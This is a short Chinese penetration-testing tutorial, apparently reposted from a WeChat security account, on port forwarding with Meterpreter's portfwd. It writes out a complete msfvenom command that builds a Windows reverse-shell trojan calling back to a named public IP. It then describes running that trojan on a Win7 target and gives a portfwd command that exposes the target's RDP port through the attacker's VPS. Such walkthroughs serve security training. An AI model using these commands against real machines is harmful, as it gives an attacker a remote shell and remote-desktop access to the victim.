基于portfwd端口转发

  • A+
所属分类:安全文章

0x01 操作步骤


portfwd是一款功能强大的端口转发工具,内置于meterpreter中,也可以自己编译,


源码地址:https://github.com/rssnsj/portfwd

靶机:win7

攻击机:47.242.59.61


公网msf


1、生成木马


msfvenom -p windows/meterpreter/reverse_tcp lhost=47.242.59.61 lport=777 -f exe -o qwer.exe


基于portfwd端口转发


打开msf,配置连接,进行监听(此处监听端口为777)


基于portfwd端口转发


基于portfwd端口转发


基于portfwd端口转发


将木马qwer.exe上传给靶机win7后打开,成功回弹


基于portfwd端口转发


0x01 端口转发


将win7的3389端口转发到公网vps端口即可连接。这里远程时是公网vps的ip和端口


Portfwd add-l[LPORT] -p[RPORT] -r[RHOST]


基于portfwd端口转发

连接成功


基于portfwd端口转发


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持基于portfwd端口转发

“如侵权请私聊公众号删文”


基于portfwd端口转发

基于portfwd端口转发

2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)

HW中如何检测和阻止DNS隧道

ctf系列文章整理

日志安全系列-安全日志

【干货】流量分析系列文章整理

【干货】超全的 渗透测试系列文章整理

【干货】持续性更新-内网渗透测试系列文章

【干货】android安全系列文章整理



扫描关注LemonSec

基于portfwd端口转发

基于portfwd端口转发


本文始发于微信公众号(LemonSec):基于portfwd端口转发

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: